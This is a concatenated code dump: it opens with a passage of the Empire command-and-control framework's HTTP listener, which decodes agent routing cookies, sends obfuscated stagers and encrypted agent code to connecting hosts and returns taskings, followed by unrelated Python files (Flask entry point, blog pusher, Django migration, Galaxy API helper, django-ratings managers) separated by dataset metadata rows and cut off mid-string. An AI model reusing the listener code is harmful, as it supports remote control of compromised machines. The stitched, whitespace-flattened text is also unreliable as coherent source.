"no-cache" response.headers['Expires'] = "0" return response @app.route('/') @app.route('/index.html') def serve_index(): """ Return default server web page if user navigates to index. """ static_dir = self.mainMenu.installPath + "data/misc/" return make_response(self.index_page(), 200) @app.route('/welcome.png') def serve_index_helper(): """ Serves image loaded by index page. """ static_dir = self.mainMenu.installPath + "data/misc/" return send_from_directory(static_dir, 'welcome.png') @app.route('/<path:request_uri>', methods=['GET']) def handle_get(request_uri): """ Handle an agent GET request. This is used during the first step of the staging process, and when the agent requests taskings. """ clientIP = request.remote_addr listenerName = self.options['Name']['Value'] message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) routingPacket = None cookie = request.headers.get('Cookie') if cookie and cookie != '': try: # see if we can extract the 'routing packet' from the specified cookie location # NOTE: this can be easily moved to a paramter, another cookie value, etc. if self.session_cookie in cookie: listenerName = self.options['Name']['Value'] message = "[*] GET cookie value from {} : {}".format(clientIP, cookie) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) cookieParts = cookie.split(';') for part in cookieParts: if part.startswith(self.session_cookie): base64RoutingPacket = part[part.find('=')+1:] # decode the routing packet base64 value in the cookie routingPacket = base64.b64decode(base64RoutingPacket) except Exception as e: routingPacket = None pass if routingPacket: # parse the routing packet and process the results dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions, clientIP) if dataResults and len(dataResults) > 0: for (language, results) in dataResults: if results: if results == 'STAGE0': # handle_agent_data() signals that the listener should return the stager.ps1 code # step 2 of negotiation -> return stager.ps1 (stage 1) listenerName = self.options['Name']['Value'] message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) stage = self.generate_stager(language=language, listenerOptions=listenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand) return make_response(stage, 200) elif results.startswith('ERROR:'): listenerName = self.options['Name']['Value'] message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(request_uri, clientIP, results) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) if 'not in cache' in results: # signal the client to restage print helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)) return make_response(self.default_response(), 401) else: return make_response(self.default_response(), 200) else: # actual taskings listenerName = self.options['Name']['Value'] message = "[*] Agent from {} retrieved taskings".format(clientIP) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(results, 200) else: # dispatcher.send("[!] Results are None...", sender='listeners/http') return make_response(self.default_response(), 200) else: return make_response(self.default_response(), 200) else: listenerName = self.options['Name']['Value'] message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(self.default_response(), 200) @app.route('/<path:request_uri>', methods=['POST']) def handle_post(request_uri): """ Handle an agent POST request. """ stagingKey = listenerOptions['StagingKey']['Value'] clientIP = request.remote_addr requestData = request.get_data() listenerName = self.options['Name']['Value'] message = "[*] POST request data length from {} : {}".format(clientIP, len(requestData)) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) # the routing packet should be at the front of the binary request.data # NOTE: this can also go into a cookie/etc. dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP) if dataResults and len(dataResults) > 0: for (language, results) in dataResults: if results: if results.startswith('STAGE2'): # TODO: document the exact results structure returned if ':' in clientIP: clientIP = '[' + str(clientIP) + ']' sessionID = results.split(' ')[1].strip() sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey'] listenerName = self.options['Name']['Value'] message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) hopListenerName = request.headers.get('Hop-Name') try: hopListener = helpers.get_listener_options(hopListenerName) tempListenerOptions = copy.deepcopy(listenerOptions) tempListenerOptions['Host']['Value'] = hopListener['Host']['Value'] except TypeError: tempListenerOptions = listenerOptions # step 6 of negotiation -> server sends patched agent.ps1/agent.py agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions, obfuscate=self.mainMenu.obfuscate, obfuscationCommand=self.mainMenu.obfuscateCommand) encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode) # TODO: wrap ^ in a routing packet? return make_response(encryptedAgent, 200) elif results[:10].lower().startswith('error') or results[:10].lower().startswith('exception'): listenerName = self.options['Name']['Value'] message = "[!] Error returned for results by {} : {}".format(clientIP, results) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(self.default_response(), 404) elif results == 'VALID': listenerName = self.options['Name']['Value'] message = "[*] Valid results returned by {}".format(clientIP) signal = json.dumps({ 'print': False, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) return make_response(self.default_response(), 404) else: return make_response(results, 200) else: return make_response(self.default_response(), 404) else: return make_response(self.default_response(), 404) try: certPath = listenerOptions['CertPath']['Value'] host = listenerOptions['Host']['Value'] if certPath.strip() != '' and host.startswith('https'): certPath = os.path.abspath(certPath) pyversion = sys.version_info # support any version of tls pyversion = sys.version_info if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13: proto = ssl.PROTOCOL_TLS elif pyversion[0] >= 3: proto = ssl.PROTOCOL_TLS else: proto = ssl.PROTOCOL_SSLv23 context = ssl.SSLContext(proto) context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath)) app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context) else: app.run(host=bindIP, port=int(port), threaded=True) except Exception as e: print helpers.color("[!] Listener startup on port %s failed: %s " % (port, e)) listenerName = self.options['Name']['Value'] message = "[!] Listener startup on port {} failed: {}".format(port, e) signal = json.dumps({ 'print': True, 'message': message }) dispatcher.send(signal, sender="listeners/http/{}".format(listenerName)) def start(self, name=''): """ Start a threaded instance of self.start_server() and store it in the self.threads dictionary keyed by the listener name. """ listenerOptions = self.options if name and name != '': self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,)) self.threads[name].start() time.sleep(1) # returns True if the listener successfully started, false otherwise return self.threads[name].is_alive() else: name = listenerOptions['Name']['Value'] self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,)) self.threads[name].start() time.sleep(1) # returns True if the listener successfully started, false otherwise return self.threads[name].is_alive() def shutdown(self, name=''): """ Terminates the server thread stored in the self.threads dictionary, keyed by the listener name. """ if name and name != '': print helpers.color("[!] Killing listener '%s'" % (name)) self.threads[name].kill() else: print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])) self.threads[self.options['Name']['Value']].kill() def generate_cookie(self): """ Generate Cookie """ chars = string.letters cookie = helpers.random_string(random.randint(6,16), charset=chars) return cookie
false
true
f705ceaa19f72aa3d963f72c85586a1a32e6de9b
101
py
Python
main.py
onkarsherkar/flask-web-app-tutorail
add0fa67c4c02d93b95c90c61671f02ea1b3d029
[ "MIT" ]
null
null
null
main.py
onkarsherkar/flask-web-app-tutorail
add0fa67c4c02d93b95c90c61671f02ea1b3d029
[ "MIT" ]
null
null
null
main.py
onkarsherkar/flask-web-app-tutorail
add0fa67c4c02d93b95c90c61671f02ea1b3d029
[ "MIT" ]
null
null
null
from website import create_app app = create_app() if __name__== '__main__': app.run(debug=True)
14.428571
30
0.722772
from website import create_app app = create_app() if __name__== '__main__': app.run(debug=True)
true
true
f705cf0495bceae4e5ea4f4df95a6ec02a280af1
3,195
py
Python
tools/src/service/entry_pusher.py
Symthy/blog-index-manager
d0c2e0b265b35be7cdb5aead1f1543f4b0306bdf
[ "MIT" ]
null
null
null
tools/src/service/entry_pusher.py
Symthy/blog-index-manager
d0c2e0b265b35be7cdb5aead1f1543f4b0306bdf
[ "MIT" ]
1
2022-01-29T08:28:36.000Z
2022-01-29T08:28:36.000Z
tools/src/service/entry_pusher.py
Symthy/blog-index-manager
d0c2e0b265b35be7cdb5aead1f1543f4b0306bdf
[ "MIT" ]
null
null
null
from typing import List from blogs.api.interface import IBlogApiExecutor from domain.blog.blog_entry import BlogEntry, BlogEntries from domain.doc.doc_entry import DocEntries, DocEntry from dump.blog_to_doc_mapping import BlogDocEntryMapping from dump.interface import IDumpEntriesAccessor from files.conf.category_group_def import CategoryGroupDef from service.external.blog_entry_index_updater import update_blog_entry_summary_file from service.external.blog_entry_pusher import push_blog_and_photo_entry from service.local.doc_entry_pusher import push_documents_to_docs def push_entry_to_docs_and_blog(api_executor: IBlogApiExecutor, dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry], dump_doc_data_accessor: IDumpEntriesAccessor[DocEntries, DocEntry], category_group_def: CategoryGroupDef, is_draft: bool, target_dir_names: List[str] = None): doc_entries = push_documents_to_docs(dump_doc_data_accessor, category_group_def, target_dir_names) if doc_entries is None: return __push_entry_from_docs_to_blog(api_executor, dump_blog_data_accessor, category_group_def, doc_entries, is_draft) def push_entry_from_docs_to_blog(api_executor: IBlogApiExecutor, dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry], dump_doc_data_accessor: IDumpEntriesAccessor[DocEntries, DocEntry], category_group_def: CategoryGroupDef, target_doc_entry_ids: List[str], is_draft: bool): doc_entries: DocEntries = dump_doc_data_accessor.load_entries(target_doc_entry_ids) __push_entry_from_docs_to_blog(api_executor, dump_blog_data_accessor, category_group_def, doc_entries, is_draft) def __push_entry_from_docs_to_blog(api_executor: IBlogApiExecutor, dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry], category_group_def: CategoryGroupDef, doc_entries: DocEntries, is_draft: bool): blog_doc_mapping = BlogDocEntryMapping() updated_blog_entry_list: List[BlogEntry] = [] for doc_entry in doc_entries.entry_list: blog_entry_id_opt = blog_doc_mapping.get_blog_entry_id(doc_entry.id) old_blog_entry_opt = None if blog_entry_id_opt is None else dump_blog_data_accessor.load_entry( blog_entry_id_opt) new_blog_entry_opt = push_blog_and_photo_entry(api_executor, doc_entry, is_draft, old_blog_entry_opt) if new_blog_entry_opt is None: print(f'[Info] blog push skip. (dir: {doc_entry.dir_path})') continue updated_blog_entry_list.append(new_blog_entry_opt) blog_doc_mapping.push_entry_pair(new_blog_entry_opt.id, doc_entry.id) # dump to file updated_blog_entries = BlogEntries(updated_blog_entry_list) dump_blog_data_accessor.save_entries(updated_blog_entries) blog_doc_mapping.dump_file() update_blog_entry_summary_file(dump_blog_data_accessor, category_group_def, updated_blog_entries)
59.166667
116
0.746166
from typing import List from blogs.api.interface import IBlogApiExecutor from domain.blog.blog_entry import BlogEntry, BlogEntries from domain.doc.doc_entry import DocEntries, DocEntry from dump.blog_to_doc_mapping import BlogDocEntryMapping from dump.interface import IDumpEntriesAccessor from files.conf.category_group_def import CategoryGroupDef from service.external.blog_entry_index_updater import update_blog_entry_summary_file from service.external.blog_entry_pusher import push_blog_and_photo_entry from service.local.doc_entry_pusher import push_documents_to_docs def push_entry_to_docs_and_blog(api_executor: IBlogApiExecutor, dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry], dump_doc_data_accessor: IDumpEntriesAccessor[DocEntries, DocEntry], category_group_def: CategoryGroupDef, is_draft: bool, target_dir_names: List[str] = None): doc_entries = push_documents_to_docs(dump_doc_data_accessor, category_group_def, target_dir_names) if doc_entries is None: return __push_entry_from_docs_to_blog(api_executor, dump_blog_data_accessor, category_group_def, doc_entries, is_draft) def push_entry_from_docs_to_blog(api_executor: IBlogApiExecutor, dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry], dump_doc_data_accessor: IDumpEntriesAccessor[DocEntries, DocEntry], category_group_def: CategoryGroupDef, target_doc_entry_ids: List[str], is_draft: bool): doc_entries: DocEntries = dump_doc_data_accessor.load_entries(target_doc_entry_ids) __push_entry_from_docs_to_blog(api_executor, dump_blog_data_accessor, category_group_def, doc_entries, is_draft) def __push_entry_from_docs_to_blog(api_executor: IBlogApiExecutor, dump_blog_data_accessor: IDumpEntriesAccessor[BlogEntries, BlogEntry], category_group_def: CategoryGroupDef, doc_entries: DocEntries, is_draft: bool): blog_doc_mapping = BlogDocEntryMapping() updated_blog_entry_list: List[BlogEntry] = [] for doc_entry in doc_entries.entry_list: blog_entry_id_opt = blog_doc_mapping.get_blog_entry_id(doc_entry.id) old_blog_entry_opt = None if blog_entry_id_opt is None else dump_blog_data_accessor.load_entry( blog_entry_id_opt) new_blog_entry_opt = push_blog_and_photo_entry(api_executor, doc_entry, is_draft, old_blog_entry_opt) if new_blog_entry_opt is None: print(f'[Info] blog push skip. (dir: {doc_entry.dir_path})') continue updated_blog_entry_list.append(new_blog_entry_opt) blog_doc_mapping.push_entry_pair(new_blog_entry_opt.id, doc_entry.id) updated_blog_entries = BlogEntries(updated_blog_entry_list) dump_blog_data_accessor.save_entries(updated_blog_entries) blog_doc_mapping.dump_file() update_blog_entry_summary_file(dump_blog_data_accessor, category_group_def, updated_blog_entries)
true
true
f705d15166e8684268640b17b721182297f2ea28
330
py
Python
bluebottle/cms/migrations/0015_merge_20161219_0946.py
terrameijar/bluebottle
b4f5ba9c4f03e678fdd36091b29240307ea69ffd
[ "BSD-3-Clause" ]
10
2015-05-28T18:26:40.000Z
2021-09-06T10:07:03.000Z
bluebottle/cms/migrations/0015_merge_20161219_0946.py
terrameijar/bluebottle
b4f5ba9c4f03e678fdd36091b29240307ea69ffd
[ "BSD-3-Clause" ]
762
2015-01-15T10:00:59.000Z
2022-03-31T15:35:14.000Z
bluebottle/cms/migrations/0015_merge_20161219_0946.py
terrameijar/bluebottle
b4f5ba9c4f03e678fdd36091b29240307ea69ffd
[ "BSD-3-Clause" ]
9
2015-02-20T13:19:30.000Z
2022-03-08T14:09:17.000Z
# -*- coding: utf-8 -*- # Generated by Django 1.10.2 on 2016-12-19 08:46 from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('cms', '0014_auto_20161216_1359'), ('cms', '0014_auto_20161216_1424'), ] operations = [ ]
19.411765
48
0.654545
from __future__ import unicode_literals from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('cms', '0014_auto_20161216_1359'), ('cms', '0014_auto_20161216_1424'), ] operations = [ ]
true
true
f705d1668beb8e7029c97be27c6db88af67d97b3
4,213
py
Python
planemo/galaxy/api.py
pvanheus/planemo
12c4256325bb1b274dcd40d64b91c1f832cf49b1
[ "CC-BY-3.0" ]
null
null
null
planemo/galaxy/api.py
pvanheus/planemo
12c4256325bb1b274dcd40d64b91c1f832cf49b1
[ "CC-BY-3.0" ]
1
2016-09-14T18:09:59.000Z
2016-09-14T18:09:59.000Z
planemo/galaxy/api.py
jmchilton/planemo
d352a085fe10cb6b7c1384663b114201da42d97b
[ "CC-BY-3.0" ]
null
null
null
"""A high-level interface to local Galaxy instances using bioblend.""" from six import StringIO from planemo.bioblend import ensure_module from planemo.bioblend import galaxy DEFAULT_MASTER_API_KEY = "test_key" def gi(port=None, url=None, key=None): """Return a bioblend ``GalaxyInstance`` for Galaxy on this port.""" ensure_module() if key is None: key = DEFAULT_MASTER_API_KEY if port is None: url = url else: url = "http://localhost:%d" % int(port) return galaxy.GalaxyInstance( url=url, key=key ) def user_api_key(admin_gi): """Use an admin authenticated account to generate a user API key.""" ensure_module() # TODO: thread-safe users = admin_gi.users all_users = users.get_users() user_id = None for user in all_users: if user["email"] == "planemo@galaxyproject.org": user_id = user["id"] if user_id is None: # TODO: Allow override with --user_api_key. galaxy_config = admin_gi.config.get_config() use_remote_user = bool(galaxy_config["use_remote_user"]) if not use_remote_user: user_response = users.create_local_user( "planemo", "planemo@galaxyproject.org", "planemo", ) user_id = user_response["id"] else: user_response = users.create_remote_user( "planemo@galaxyproject.org", ) user_id = user_response["id"] return users.create_user_apikey(user_id) def summarize_history(ctx, gi, history_id): """Summarize a history with print() based on similar code in Galaxy for populators. """ if not ctx.verbose: return if history_id is None: raise ValueError("summarize_history passed empty history_id") try: history_contents = gi.histories.show_history(history_id, contents=True) except Exception: print("Failed to fetch history contents in summarize_history.") return for history_content in history_contents: history_content_id = history_content.get('id', None) print("| %d - %s (HID - NAME) " % (int(history_content['hid']), history_content['name'])) if history_content['history_content_type'] == 'dataset_collection': history_contents_json = gi.histories.show_dataset_collection(history_id, history_content["id"]) print("| Dataset Collection: %s" % history_contents_json) continue try: dataset_info = gi.histories.show_dataset(history_id, history_content_id) print("| Dataset State:") print(_format_for_summary(dataset_info.get("state"), "Dataset state is unknown.")) print("| Dataset Blurb:") print(_format_for_summary(dataset_info.get("misc_blurb", ""), "Dataset blurb was empty.")) print("| Dataset Info:") print(_format_for_summary(dataset_info.get("misc_info", ""), "Dataset info is empty.")) print("| Peek:") print(_format_for_summary(dataset_info.get("peek", ""), "Peek unavilable.")) except Exception: print("| *PLANEMO ERROR FETCHING DATASET DETAILS*") try: provenance_info = _dataset_provenance(gi, history_id, history_content_id) print("| Dataset Job Standard Output:") print(_format_for_summary(provenance_info.get("stdout", ""), "Standard output was empty.")) print("| Dataset Job Standard Error:") print(_format_for_summary(provenance_info.get("stderr", ""), "Standard error was empty.")) except Exception: print("| *PLANEMO ERROR FETCHING JOB DETAILS*") print("|") def _format_for_summary(blob, empty_message, prefix="| "): contents = "\n".join(["%s%s" % (prefix, line.strip()) for line in StringIO(blob).readlines() if line.rstrip("\n\r")]) return contents or "%s*%s*" % (prefix, empty_message) def _dataset_provenance(gi, history_id, id): provenance = gi.histories.show_dataset_provenance(history_id, id) return provenance __all__ = ( "DEFAULT_MASTER_API_KEY", "gi", "user_api_key", )
36.318966
121
0.635652
from six import StringIO from planemo.bioblend import ensure_module from planemo.bioblend import galaxy DEFAULT_MASTER_API_KEY = "test_key" def gi(port=None, url=None, key=None): ensure_module() if key is None: key = DEFAULT_MASTER_API_KEY if port is None: url = url else: url = "http://localhost:%d" % int(port) return galaxy.GalaxyInstance( url=url, key=key ) def user_api_key(admin_gi): ensure_module() users = admin_gi.users all_users = users.get_users() user_id = None for user in all_users: if user["email"] == "planemo@galaxyproject.org": user_id = user["id"] if user_id is None: galaxy_config = admin_gi.config.get_config() use_remote_user = bool(galaxy_config["use_remote_user"]) if not use_remote_user: user_response = users.create_local_user( "planemo", "planemo@galaxyproject.org", "planemo", ) user_id = user_response["id"] else: user_response = users.create_remote_user( "planemo@galaxyproject.org", ) user_id = user_response["id"] return users.create_user_apikey(user_id) def summarize_history(ctx, gi, history_id): if not ctx.verbose: return if history_id is None: raise ValueError("summarize_history passed empty history_id") try: history_contents = gi.histories.show_history(history_id, contents=True) except Exception: print("Failed to fetch history contents in summarize_history.") return for history_content in history_contents: history_content_id = history_content.get('id', None) print("| %d - %s (HID - NAME) " % (int(history_content['hid']), history_content['name'])) if history_content['history_content_type'] == 'dataset_collection': history_contents_json = gi.histories.show_dataset_collection(history_id, history_content["id"]) print("| Dataset Collection: %s" % history_contents_json) continue try: dataset_info = gi.histories.show_dataset(history_id, history_content_id) print("| Dataset State:") print(_format_for_summary(dataset_info.get("state"), "Dataset state is unknown.")) print("| Dataset Blurb:") print(_format_for_summary(dataset_info.get("misc_blurb", ""), "Dataset blurb was empty.")) print("| Dataset Info:") print(_format_for_summary(dataset_info.get("misc_info", ""), "Dataset info is empty.")) print("| Peek:") print(_format_for_summary(dataset_info.get("peek", ""), "Peek unavilable.")) except Exception: print("| *PLANEMO ERROR FETCHING DATASET DETAILS*") try: provenance_info = _dataset_provenance(gi, history_id, history_content_id) print("| Dataset Job Standard Output:") print(_format_for_summary(provenance_info.get("stdout", ""), "Standard output was empty.")) print("| Dataset Job Standard Error:") print(_format_for_summary(provenance_info.get("stderr", ""), "Standard error was empty.")) except Exception: print("| *PLANEMO ERROR FETCHING JOB DETAILS*") print("|") def _format_for_summary(blob, empty_message, prefix="| "): contents = "\n".join(["%s%s" % (prefix, line.strip()) for line in StringIO(blob).readlines() if line.rstrip("\n\r")]) return contents or "%s*%s*" % (prefix, empty_message) def _dataset_provenance(gi, history_id, id): provenance = gi.histories.show_dataset_provenance(history_id, id) return provenance __all__ = ( "DEFAULT_MASTER_API_KEY", "gi", "user_api_key", )
true
true
f705d2280b305e92ead506194e8bf7b9a79b98f6
2,143
py
Python
setup.py
chowmean/DBSheet
3f1c521320cb3564c4ff55cd70c8a1978dd32a4c
[ "Apache-2.0" ]
3
2017-08-18T20:04:12.000Z
2021-01-08T12:23:43.000Z
setup.py
chowmean/DBSheet
3f1c521320cb3564c4ff55cd70c8a1978dd32a4c
[ "Apache-2.0" ]
1
2021-06-01T23:13:57.000Z
2021-06-01T23:13:57.000Z
setup.py
chowmean/DBSheet
3f1c521320cb3564c4ff55cd70c8a1978dd32a4c
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python # # Python installation script # Author - @chowmean from __future__ import print_function import os.path import sys import setuptools # Project variables VER_PROP_FILE = os.path.join(os.path.dirname(__file__), 'version.properties') REQUIREMENTS_FILE = os.path.join(os.path.dirname(__file__), 'requirements.txt') CLASSIFIERS = [ "Programming Language :: Python", "Operating System :: OS Independent", "Intended Audience :: Developers", "Development Status :: 4 - Beta", "Environment :: Plugins", "Topic :: Software Development :: Libraries :: Python Modules", "License :: Other/Proprietary License", "Natural Language :: English", ] # Read version properties file and extract version number. def get_version(): version = "0.1.4" try: with open(VER_PROP_FILE) as f: for line in f.readlines(): if line.startswith("version="): version = line.lstrip('version=').strip() break except IOError as ioe: print(ioe, file=sys.stderr) return version # Read requirements.txt file and extract the list of dependency. def get_install_requirements(): # read requirements requires = [] try: with open(REQUIREMENTS_FILE) as f: requires = list(map(lambda l: l.strip(), f.readlines())) except IOError as ioe: print(ioe, file=sys.stderr) sys.exit(1) return requires if __name__ == '__main__': with open('README.md', 'r') as f: readme = f.read() setuptools.setup( name="db_sheet", version=get_version(), description="db_sheet: Using Google Spreadsheets as Database.", author="chowmean", author_email="gaurav.dev.iiitm@gmail.com", url="https://github.com/chowmean/DBSheet", keywords=["DBSheet, db_sheet, google spreadsheets. excel"], install_requires=get_install_requirements(), packages=["db_sheet", ], classifiers=CLASSIFIERS, long_description=readme, long_description_content_type="text/markdown", license="Apache-2.0" )
29.763889
79
0.643957
from __future__ import print_function import os.path import sys import setuptools VER_PROP_FILE = os.path.join(os.path.dirname(__file__), 'version.properties') REQUIREMENTS_FILE = os.path.join(os.path.dirname(__file__), 'requirements.txt') CLASSIFIERS = [ "Programming Language :: Python", "Operating System :: OS Independent", "Intended Audience :: Developers", "Development Status :: 4 - Beta", "Environment :: Plugins", "Topic :: Software Development :: Libraries :: Python Modules", "License :: Other/Proprietary License", "Natural Language :: English", ] def get_version(): version = "0.1.4" try: with open(VER_PROP_FILE) as f: for line in f.readlines(): if line.startswith("version="): version = line.lstrip('version=').strip() break except IOError as ioe: print(ioe, file=sys.stderr) return version def get_install_requirements(): requires = [] try: with open(REQUIREMENTS_FILE) as f: requires = list(map(lambda l: l.strip(), f.readlines())) except IOError as ioe: print(ioe, file=sys.stderr) sys.exit(1) return requires if __name__ == '__main__': with open('README.md', 'r') as f: readme = f.read() setuptools.setup( name="db_sheet", version=get_version(), description="db_sheet: Using Google Spreadsheets as Database.", author="chowmean", author_email="gaurav.dev.iiitm@gmail.com", url="https://github.com/chowmean/DBSheet", keywords=["DBSheet, db_sheet, google spreadsheets. excel"], install_requires=get_install_requirements(), packages=["db_sheet", ], classifiers=CLASSIFIERS, long_description=readme, long_description_content_type="text/markdown", license="Apache-2.0" )
true
true
f705d35f606de1dd5f2d3137aa565c331846f652
5,403
py
Python
djangoratings/managers.py
adw0rd/django-ratings
941048e05a14bb997966fe1d4e8fd638ee66d76f
[ "BSD-2-Clause" ]
1
2021-04-29T11:19:47.000Z
2021-04-29T11:19:47.000Z
djangoratings/managers.py
adw0rd/django-ratings
941048e05a14bb997966fe1d4e8fd638ee66d76f
[ "BSD-2-Clause" ]
null
null
null
djangoratings/managers.py
adw0rd/django-ratings
941048e05a14bb997966fe1d4e8fd638ee66d76f
[ "BSD-2-Clause" ]
null
null
null
from django.db.models import Manager from django.db.models.query import QuerySet from django.contrib.contenttypes.models import ContentType import itertools class VoteQuerySet(QuerySet): def delete(self, *args, **kwargs): """Handles updating the related `votes` and `score` fields attached to the model.""" # XXX: circular import from fields import RatingField qs = self.distinct().values_list('content_type', 'object_id').order_by('content_type') to_update = [] for content_type, objects in itertools.groupby(qs, key=lambda x: x[0]): model_class = ContentType.objects.get(pk=content_type).model_class() if model_class: to_update.extend(list(model_class.objects.filter(pk__in=list(objects)[0]))) retval = super(VoteQuerySet, self).delete(*args, **kwargs) # TODO: this could be improved for obj in to_update: for field in getattr(obj, '_djangoratings', []): getattr(obj, field.name)._update(commit=False) obj.save() return retval class VoteManager(Manager): def get_query_set(self): return VoteQuerySet(self.model) def get_for_user_in_bulk(self, objects, user): objects = list(objects) if len(objects) > 0: ctype = ContentType.objects.get_for_model(objects[0]) votes = list(self.filter(content_type__pk=ctype.id, object_id__in=[obj._get_pk_val() \ for obj in objects], user__pk=user.id)) vote_dict = dict([(vote.object_id, vote) for vote in votes]) else: vote_dict = {} return vote_dict class SimilarUserManager(Manager): def get_recommendations(self, user, model_class, min_score=1): from djangoratings.models import Vote, IgnoredObject content_type = ContentType.objects.get_for_model(model_class) params = dict( v=Vote._meta.db_table, sm=self.model._meta.db_table, m=model_class._meta.db_table, io=IgnoredObject._meta.db_table, ) objects = model_class._default_manager.extra( tables=[params['v']], where=[ '%(v)s.object_id = %(m)s.id and %(v)s.content_type_id = %%s' % params, '%(v)s.user_id IN (select to_user_id from %(sm)s where from_user_id = %%s and exclude = 0)' % params, '%(v)s.score >= %%s' % params, # Exclude already rated maps '%(v)s.object_id NOT IN (select object_id from %(v)s where content_type_id = %(v)s.content_type_id and user_id = %%s)' % params, # IgnoredObject exclusions '%(v)s.object_id NOT IN (select object_id from %(io)s where content_type_id = %(v)s.content_type_id and user_id = %%s)' % params, ], params=[content_type.id, user.id, min_score, user.id, user.id] ).distinct() # objects = model_class._default_manager.filter(pk__in=content_type.votes.extra( # where=['user_id IN (select to_user_id from %s where from_user_id = %d and exclude = 0)' % (self.model._meta.db_table, user.pk)], # ).filter(score__gte=min_score).exclude( # object_id__in=IgnoredObject.objects.filter(content_type=content_type, user=user).values_list('object_id', flat=True), # ).exclude( # object_id__in=Vote.objects.filter(content_type=content_type, user=user).values_list('object_id', flat=True) # ).distinct().values_list('object_id', flat=True)) return objects def update_recommendations(self): # TODO: this is mysql only atm # TODO: this doesnt handle scores that have multiple values (e.g. 10 points, 5 stars) # due to it calling an agreement as score = score. We need to loop each rating instance # and express the condition based on the range. from djangoratings.models import Vote from django.db import connection, DatabaseError cursor = connection.cursor() cursor.execute('BEGIN') try: cursor.execute('TRUNCATE TABLE %s' % (self.model._meta.db_table,)) except DatabaseError: cursor.execute('DELETE FROM %s' % (self.model._meta.db_table,)) cursor.execute("""INSERT INTO %(t1)s (to_user_id, from_user_id, agrees, disagrees, exclude) SELECT v1.user_id, v2.user_id, SUM(if(v2.score = v1.score, 1, 0)) AS agrees, SUM(if(v2.score != v1.score, 1, 0)) AS disagrees, 0 FROM %(t2)s AS v1 INNER JOIN %(t2)s AS v2 ON v1.user_id != v2.user_id AND v1.object_id = v2.object_id AND v1.content_type_id = v2.content_type_id WHERE v1.user_id is not null AND v2.user_id is not null GROUP BY v1.user_id, v2.user_id HAVING agrees / (disagrees + 0.0001) > 3 ON DUPLICATE KEY UPDATE agrees=values(agrees), disagrees=values(disagrees);""" % dict( t1=self.model._meta.db_table, t2=Vote._meta.db_table, )) cursor.execute('commit') cursor.close()
45.403361
145
0.594855
from django.db.models import Manager from django.db.models.query import QuerySet from django.contrib.contenttypes.models import ContentType import itertools class VoteQuerySet(QuerySet): def delete(self, *args, **kwargs): from fields import RatingField qs = self.distinct().values_list('content_type', 'object_id').order_by('content_type') to_update = [] for content_type, objects in itertools.groupby(qs, key=lambda x: x[0]): model_class = ContentType.objects.get(pk=content_type).model_class() if model_class: to_update.extend(list(model_class.objects.filter(pk__in=list(objects)[0]))) retval = super(VoteQuerySet, self).delete(*args, **kwargs) for obj in to_update: for field in getattr(obj, '_djangoratings', []): getattr(obj, field.name)._update(commit=False) obj.save() return retval class VoteManager(Manager): def get_query_set(self): return VoteQuerySet(self.model) def get_for_user_in_bulk(self, objects, user): objects = list(objects) if len(objects) > 0: ctype = ContentType.objects.get_for_model(objects[0]) votes = list(self.filter(content_type__pk=ctype.id, object_id__in=[obj._get_pk_val() \ for obj in objects], user__pk=user.id)) vote_dict = dict([(vote.object_id, vote) for vote in votes]) else: vote_dict = {} return vote_dict class SimilarUserManager(Manager): def get_recommendations(self, user, model_class, min_score=1): from djangoratings.models import Vote, IgnoredObject content_type = ContentType.objects.get_for_model(model_class) params = dict( v=Vote._meta.db_table, sm=self.model._meta.db_table, m=model_class._meta.db_table, io=IgnoredObject._meta.db_table, ) objects = model_class._default_manager.extra( tables=[params['v']], where=[ '%(v)s.object_id = %(m)s.id and %(v)s.content_type_id = %%s' % params, '%(v)s.user_id IN (select to_user_id from %(sm)s where from_user_id = %%s and exclude = 0)' % params, '%(v)s.score >= %%s' % params, '%(v)s.object_id NOT IN (select object_id from %(v)s where content_type_id = %(v)s.content_type_id and user_id = %%s)' % params, '%(v)s.object_id NOT IN (select object_id from %(io)s where content_type_id = %(v)s.content_type_id and 